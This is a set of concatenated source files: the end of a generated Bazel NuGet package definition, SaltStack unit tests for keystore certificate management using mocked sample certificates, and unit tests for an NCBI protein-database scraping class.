"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.4": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.5": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard1.6": [
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard1.3/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/netstandard2.0/Microsoft.DotNet.PlatformAbstractions.xml",
],
},
mono_files = [
"lib/net45/Microsoft.DotNet.PlatformAbstractions.dll",
"lib/net45/Microsoft.DotNet.PlatformAbstractions.xml",
],
)
nuget_package(
name = "system.security.cryptography.protecteddata",
package = "system.security.cryptography.protecteddata",
version = "4.5.0",
sha256 = "67e5f5676944acb2fb627b768c5b3392eebf220ae780edd5d5b49f6530621487",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp2.1": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.0": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.1": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
core_ref = {
"netcoreapp2.0": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp2.1": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.0": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netcoreapp3.1": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
net_lib = {
"net46": "lib/net46/System.Security.Cryptography.ProtectedData.dll",
"net461": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net462": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net47": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net471": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net472": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"net48": "lib/net461/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.3": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.4": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.5": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.6": "lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.0": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.1": "lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
net_ref = {
"net46": "ref/net46/System.Security.Cryptography.ProtectedData.dll",
"net461": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net462": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net47": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net471": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net472": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"net48": "ref/net461/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.3": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.4": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.5": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard1.6": "ref/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.0": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
"netstandard2.1": "ref/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
},
mono_lib = "lib/net461/System.Security.Cryptography.ProtectedData.dll",
mono_ref = "ref/net461/System.Security.Cryptography.ProtectedData.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netcoreapp2.1": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netcoreapp3.0": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netcoreapp3.1": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
},
net_files = {
"net46": [
"lib/net46/System.Security.Cryptography.ProtectedData.dll",
],
"net461": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net462": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net47": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net471": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net472": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"net48": [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.3": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.4": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.5": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard1.6": [
"lib/netstandard1.3/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard2.0": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
"netstandard2.1": [
"lib/netstandard2.0/System.Security.Cryptography.ProtectedData.dll",
],
},
mono_files = [
"lib/net461/System.Security.Cryptography.ProtectedData.dll",
],
)
### End of generated by the tool
    return
# File: tests/unit/states/test_keystore.py (ifraixedes/saltstack-salt, Apache-2.0)
"""
Test cases for keystore state
"""
import salt.states.keystore as keystore
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase
class KeystoreTestCase(TestCase, LoaderModuleMockMixin):
"""
Test cases for salt.states.keystore
"""
def setup_loader_modules(self):
return {keystore: {"__opts__": {"test": False}}}
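The mixin wires the returned dunder dicts (`__opts__`, `__salt__`) into the module under test, and the test bodies below temporarily override them with `patch.dict`. A minimal standalone sketch of that `patch.dict` behavior, using a plain dict with no salt dependency:

```python
from unittest.mock import patch

opts = {"test": False}

# Inside the context the key is overridden; on exit the original value returns.
with patch.dict(opts, {"test": True}):
    assert opts["test"] is True

assert opts["test"] is False
```

This in-place override-and-restore is why the tests can flip `__opts__['test']` per block without leaking state between test cases.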
@patch("os.path.exists", MagicMock(return_value=True))
def test_cert_already_present(self):
"""
Test that no changes are reported when the certificate is already present
"""
cert_return = [
{
"valid_until": "August 21 2017",
"sha1": "07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5",
"valid_start": "August 22 2012",
"type": "TrustedCertEntry",
"alias": "stringhost",
"expired": True,
}
]
x509_return = {
"Not After": "2017-08-21 05:26:54",
"Subject Hash": "97:95:14:4F",
"Serial Number": "0D:FA",
"SHA1 Finger Print": (
"07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5"
),
"SHA-256 Finger Print": "5F:0F:B5:16:65:81:AA:E6:4A:10:1C:15:83:B1:BE:BE:74:E8:14:A9:1E:7A:8A:14:BA:1E:83:5D:78:F6:E9:E7",
"MD5 Finger Print": "80:E6:17:AF:78:D8:E4:B8:FB:5F:41:3A:27:1D:CC:F2",
"Version": 1,
"Key Size": 512,
"Public Key": (
"-----BEGIN PUBLIC"
" KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJv8ZpB5hEK7qxP9K3v43hUS5fGT4waK\ne7ix4Z4mu5UBv+cw7WSFAt0Vaag0sAbsPzU8Hhsrj/qPABvfB8asUwcCAwEAAQ==\n-----END"
" PUBLIC KEY-----\n"
),
"Issuer": {
"C": "JP",
"organizationName": "Frank4DD",
"CN": "Frank4DD Web CA",
"SP": "Tokyo",
"L": "Chuo-ku",
"emailAddress": "support@frank4dd.com",
"OU": "WebCert Support",
},
"Issuer Hash": "92:DA:45:6B",
"Not Before": "2012-08-22 05:26:54",
"Subject": {
"C": "JP",
"SP": "Tokyo",
"organizationName": "Frank4DD",
"CN": "www.example.com",
},
}
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
state_return = {
"name": name,
"changes": {},
"result": True,
"comment": "No changes made.\n",
}
# with patch.dict(keystore.__opts__, {'test': False}):
with patch.dict(
keystore.__salt__, {"keystore.list": MagicMock(return_value=cert_return)}
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
with patch.dict(keystore.__opts__, {"test": True}):
with patch.dict(
keystore.__salt__,
{"keystore.list": MagicMock(return_value=cert_return)},
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
@patch("os.path.exists", MagicMock(return_value=True))
def test_cert_update(self):
"""
Test that an existing alias is updated when its certificate differs
"""
cert_return = [
{
"valid_until": "August 21 2017",
"sha1": "07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5",
"valid_start": "August 22 2012",
"type": "TrustedCertEntry",
"alias": "stringhost",
"expired": True,
}
]
x509_return = {
"Not After": "2017-08-21 05:26:54",
"Subject Hash": "97:95:14:4F",
"Serial Number": "0D:FA",
"SHA1 Finger Print": (
"07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D6"
),
"SHA-256 Finger Print": "5F:0F:B5:16:65:81:AA:E6:4A:10:1C:15:83:B1:BE:BE:74:E8:14:A9:1E:7A:8A:14:BA:1E:83:5D:78:F6:E9:E7",
"MD5 Finger Print": "80:E6:17:AF:78:D8:E4:B8:FB:5F:41:3A:27:1D:CC:F2",
"Version": 1,
"Key Size": 512,
"Public Key": (
"-----BEGIN PUBLIC"
" KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJv8ZpB5hEK7qxP9K3v43hUS5fGT4waK\ne7ix4Z4mu5UBv+cw7WSFAt0Vaag0sAbsPzU8Hhsrj/qPABvfB8asUwcCAwEAAQ==\n-----END"
" PUBLIC KEY-----\n"
),
"Issuer": {
"C": "JP",
"organizationName": "Frank4DD",
"CN": "Frank4DD Web CA",
"SP": "Tokyo",
"L": "Chuo-ku",
"emailAddress": "support@frank4dd.com",
"OU": "WebCert Support",
},
"Issuer Hash": "92:DA:45:6B",
"Not Before": "2012-08-22 05:26:54",
"Subject": {
"C": "JP",
"SP": "Tokyo",
"organizationName": "Frank4DD",
"CN": "www.example.com",
},
}
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
test_return = {
"name": name,
"changes": {},
"result": None,
"comment": "Alias stringhost would have been updated\n",
}
state_return = {
"name": name,
"changes": {"stringhost": "Updated"},
"result": True,
"comment": "Alias stringhost updated.\n",
}
with patch.dict(keystore.__opts__, {"test": True}):
with patch.dict(
keystore.__salt__,
{"keystore.list": MagicMock(return_value=cert_return)},
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), test_return
)
with patch.dict(
keystore.__salt__, {"keystore.list": MagicMock(return_value=cert_return)}
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
with patch.dict(
keystore.__salt__, {"keystore.remove": MagicMock(return_value=True)}
):
with patch.dict(
keystore.__salt__,
{"keystore.add": MagicMock(return_value=True)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
@patch("os.path.exists", MagicMock(return_value=False))
def test_new_file(self):
"""
Test that a new keystore file is created with the given aliases
"""
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
test_return = {
"name": name,
"changes": {},
"result": None,
"comment": "Alias stringhost would have been added\n",
}
state_return = {
"name": name,
"changes": {"stringhost": "Added"},
"result": True,
"comment": "Alias stringhost added.\n",
}
with patch.dict(keystore.__opts__, {"test": True}):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), test_return
)
with patch.dict(
keystore.__salt__, {"keystore.remove": MagicMock(return_value=True)}
):
with patch.dict(
keystore.__salt__, {"keystore.add": MagicMock(return_value=True)}
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries), state_return
)
@patch("os.path.exists", MagicMock(return_value=True))
def test_force_remove(self):
"""
Test that unmanaged aliases are removed when force_remove is set
"""
cert_return = [
{
"valid_until": "August 21 2017",
"sha1": "07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D5",
"valid_start": "August 22 2012",
"type": "TrustedCertEntry",
"alias": "oldhost",
"expired": True,
}
]
x509_return = {
"Not After": "2017-08-21 05:26:54",
"Subject Hash": "97:95:14:4F",
"Serial Number": "0D:FA",
"SHA1 Finger Print": (
"07:1C:B9:4F:0C:C8:51:4D:02:41:24:70:8E:E8:B2:68:7B:D7:D9:D6"
),
"SHA-256 Finger Print": "5F:0F:B5:16:65:81:AA:E6:4A:10:1C:15:83:B1:BE:BE:74:E8:14:A9:1E:7A:8A:14:BA:1E:83:5D:78:F6:E9:E7",
"MD5 Finger Print": "80:E6:17:AF:78:D8:E4:B8:FB:5F:41:3A:27:1D:CC:F2",
"Version": 1,
"Key Size": 512,
"Public Key": (
"-----BEGIN PUBLIC"
" KEY-----\nMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJv8ZpB5hEK7qxP9K3v43hUS5fGT4waK\ne7ix4Z4mu5UBv+cw7WSFAt0Vaag0sAbsPzU8Hhsrj/qPABvfB8asUwcCAwEAAQ==\n-----END"
" PUBLIC KEY-----\n"
),
"Issuer": {
"C": "JP",
"organizationName": "Frank4DD",
"CN": "Frank4DD Web CA",
"SP": "Tokyo",
"L": "Chuo-ku",
"emailAddress": "support@frank4dd.com",
"OU": "WebCert Support",
},
"Issuer Hash": "92:DA:45:6B",
"Not Before": "2012-08-22 05:26:54",
"Subject": {
"C": "JP",
"SP": "Tokyo",
"organizationName": "Frank4DD",
"CN": "www.example.com",
},
}
name = "keystore.jks"
passphrase = "changeit"
entries = [
{
"alias": "stringhost",
"certificate": """-----BEGIN CERTIFICATE-----
MIICEjCCAXsCAg36MA0GCSqGSIb3DQEBBQUAMIGbMQswCQYDVQQGEwJKUDEOMAwG
A1UECBMFVG9reW8xEDAOBgNVBAcTB0NodW8ta3UxETAPBgNVBAoTCEZyYW5rNERE
MRgwFgYDVQQLEw9XZWJDZXJ0IFN1cHBvcnQxGDAWBgNVBAMTD0ZyYW5rNEREIFdl
YiBDQTEjMCEGCSqGSIb3DQEJARYUc3VwcG9ydEBmcmFuazRkZC5jb20wHhcNMTIw
ODIyMDUyNjU0WhcNMTcwODIxMDUyNjU0WjBKMQswCQYDVQQGEwJKUDEOMAwGA1UE
CAwFVG9reW8xETAPBgNVBAoMCEZyYW5rNEREMRgwFgYDVQQDDA93d3cuZXhhbXBs
ZS5jb20wXDANBgkqhkiG9w0BAQEFAANLADBIAkEAm/xmkHmEQrurE/0re/jeFRLl
8ZPjBop7uLHhnia7lQG/5zDtZIUC3RVpqDSwBuw/NTweGyuP+o8AG98HxqxTBwID
AQABMA0GCSqGSIb3DQEBBQUAA4GBABS2TLuBeTPmcaTaUW/LCB2NYOy8GMdzR1mx
8iBIu2H6/E2tiY3RIevV2OW61qY2/XRQg7YPxx3ffeUugX9F4J/iPnnu1zAxxyBy
2VguKv4SWjRFoRkIfIlHX0qVviMhSlNy2ioFLy7JcPZb+v3ftDGywUqcBiVDoea0
Hn+GmxZA\n-----END CERTIFICATE-----""",
}
]
test_return = {
"name": name,
"changes": {},
"result": None,
"comment": (
"Alias stringhost would have been updated\nAlias oldhost would have"
" been removed"
),
}
state_return = {
"name": name,
"changes": {"oldhost": "Removed", "stringhost": "Updated"},
"result": True,
"comment": "Alias stringhost updated.\nAlias oldhost removed.\n",
}
with patch.dict(keystore.__opts__, {"test": True}):
with patch.dict(
keystore.__salt__,
{"keystore.list": MagicMock(return_value=cert_return)},
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
self.assertDictEqual(
keystore.managed(name, passphrase, entries, force_remove=True),
test_return,
)
with patch.dict(
keystore.__salt__, {"keystore.list": MagicMock(return_value=cert_return)}
):
with patch.dict(
keystore.__salt__,
{"x509.read_certificate": MagicMock(return_value=x509_return)},
):
with patch.dict(
keystore.__salt__, {"keystore.remove": MagicMock(return_value=True)}
):
with patch.dict(
keystore.__salt__,
{"keystore.add": MagicMock(return_value=True)},
):
self.assertDictEqual(
keystore.managed(
name, passphrase, entries, force_remove=True
),
state_return,
)
# File: testing/NCBI_tests.py (denkovarik/EC-Scrape, MIT)
import unittest
import os, io, sys, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from classes.NCBI import *
class NCBI_tests(unittest.TestCase):
"""
Runs all tests for the NCBI class.
"""
def test_search(self):
"""
Tests doing a search on the NCBI protein database. PLEASE NOTE THAT
TESTS IN THIS TEST CASE MAY BREAK IF NCBI CHANGES THE ENTRY FOR
THE ACCESSION NUMBER CAI38050. This should be the only test case
that is susceptible to this.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase search
ncbi = NCBI()
accession = "CAI38050"
exp = {
'Protein name': 'naphthoate synthase',
'Organism': 'Corynebacterium jeikeium K411',
'EC Number': '4.1.3.36'
}
email = "dennis.kovarik@mines.sdsmt.edu"
rslt = ncbi.protein.search(accession, email)
self.assertTrue(rslt == exp)
# Test with no expected results
ncbi = NCBI()
accession = "WP_NOT!!!"
email = "dennis.kovarik@mines.sdsmt.edu"
rslt = ncbi.protein.search(accession, email)
self.assertTrue(rslt == None)
def test_extract_ec(self):
"""
Tests the NCBI.Protein member function 'extract_ec()' on its
ability to retrieve the EC number from the hit on the NCBI protein
database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
self.assertTrue(ncbi.protein.extract_ec(content, accession) == '4.1.3.36')
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
self.assertTrue(ncbi.protein.extract_ec(content, accession) == '2.7.7.27')
def test_has_ec(self):
"""
Tests the NCBI.Protein member function 'has_ec()' on its ability to
determine if a hit on NCBI has an ec number reported.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
self.assertTrue(ncbi.protein.has_ec(content, accession))
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411]2.txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
self.assertFalse(ncbi.protein.has_ec(content, accession))
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
with open(path) as f:
content = f.read()
f.close()
self.assertTrue(os.path.isfile(path))
ncbi = NCBI()
accession = "WP_008881006"
self.assertFalse(ncbi.protein.has_ec(content, accession))
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
self.assertTrue(ncbi.protein.has_ec(content, accession))
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
self.assertFalse(ncbi.protein.has_ec(content, accession))
def test_extract_organism(self):
"""
Tests the NCBI.Protein member function 'extract_organism()' on its
ability to retrieve the organism name from the hit on the NCBI
protein database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
exp = "Corynebacterium jeikeium K411"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
with open(path) as f:
content = f.read()
f.close()
self.assertTrue(os.path.isfile(path))
ncbi = NCBI()
exp = "Geobacillus"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
exp = "Oscillatoria nigro-viridis PCC 7112"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
exp = "Geobacillus"
self.assertTrue(ncbi.protein.extract_organism(content) == exp)
def test_extract_Protein_Name(self):
"""
Tests the NCBI.Protein member function 'extract_protein_name()' on its
ability to retrieve the protein name from the hit on the NCBI protein
database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "CAI38050"
exp = "naphthoate synthase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
with open(path) as f:
content = f.read()
f.close()
self.assertTrue(os.path.isfile(path))
ncbi = NCBI()
accession = "WP_008881006"
exp = "GNAT family N-acetyltransferase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
# Glucose-1-phosphate adenylyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_Glucose-1_phosphate_adenylyltransferase_[Oscillatoria_nigro_viridis_PCC_7112].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "AFZ06929"
exp = "Glucose-1-phosphate adenylyltransferase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
# aminodeoxychorismate lyase hit
path = currentdir + "\\test_files\\biopython_entrez_aminodeoxychorismate_lyase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
f.close()
ncbi = NCBI()
accession = "WP_011887816"
exp = "aminodeoxychorismate lyase"
self.assertTrue(ncbi.protein.extract_protein_name(content, accession) == exp)
def test_extract_info(self):
"""
Tests the NCBI.Protein member function 'extract_info()' on its ability
to retrieve the protein name, organism, and EC number (if available)
from the hit on the NCBI protein database.
:param self: An instance of the NCBI_tests class.
"""
# naphthoate synthase hit
path = currentdir + "\\test_files\\biopython_entrez_naphthoate_synthase_[Corynebacterium_jeikeium_K411].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
ncbi = NCBI()
accession = "CAI38050"
exp = {
'Protein name': 'naphthoate synthase',
'Organism': 'Corynebacterium jeikeium K411',
'EC Number': '4.1.3.36'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
f.close()
# GNAT family N-acetyltransferase hit
path = currentdir + "\\test_files\\biopython_entrez_GNAT_family_N_acetyltransferase_[Geobacillus].txt"
self.assertTrue(os.path.isfile(path))
with open(path) as f:
content = f.read()
ncbi = NCBI()
accession = "WP_008881006"
exp = {
'Protein name': 'GNAT family N-acetyltransferase',
'Organism': 'Geobacillus'
}
self.assertTrue(ncbi.protein.extract_info(content, accession) == exp)
f.close()
# Glucose-1-phosphate adenylyltransferase hit
